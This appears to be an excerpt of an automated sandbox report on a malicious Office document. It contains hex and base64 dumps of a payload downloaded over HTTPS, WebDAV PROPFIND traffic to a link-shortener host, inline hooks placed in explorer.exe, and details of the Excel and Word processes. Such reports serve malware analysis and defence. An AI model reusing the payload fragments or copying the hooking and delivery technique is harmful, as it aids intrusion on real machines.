                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                                                                      Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                                                                      Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                                                                      Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                                                                      Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                                                                      Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                                                                      Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                                                                      Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                                                                      Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                                                                      2024-10-07 05:14:57 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                                                                      Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                      8192.168.2.224917214.194.50.211443
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:56 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                                      2024-10-07 05:14:57 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:57 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      2024-10-07 05:14:57 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                                      Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                                      2024-10-07 05:14:57 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 35 2c 37 31 30 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                      Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 35,710 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                                      2024-10-07 05:14:57 UTC2INData Raw: 0d 0a
                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                      2024-10-07 05:14:57 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                      Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                      9192.168.2.224917314.194.50.211443
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-07 05:14:58 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                                      2024-10-07 05:14:59 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:59 GMT
                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      2024-10-07 05:14:59 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                                      Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                                      2024-10-07 05:14:59 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 35 2c 37 31 33 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                      Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 35,713 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                                      2024-10-07 05:14:59 UTC2INData Raw: 0d 0a
                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                      2024-10-07 05:14:59 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                      Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                      GetMessageWINLINEexplorer.exe
                                                                                                                                                                                      GetMessageAINLINEexplorer.exe
                                                                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE4
                                                                                                                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE4
                                                                                                                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE4
                                                                                                                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE4

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                      Start time:01:14:07
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                      Imagebase:0x13fb10000
                                                                                                                                                                                      File size:28'253'536 bytes
                                                                                                                                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                      Start time:01:14:31
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                                                                                                                                      Imagebase:0x13fe10000
                                                                                                                                                                                      File size:1'423'704 bytes
                                                                                                                                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
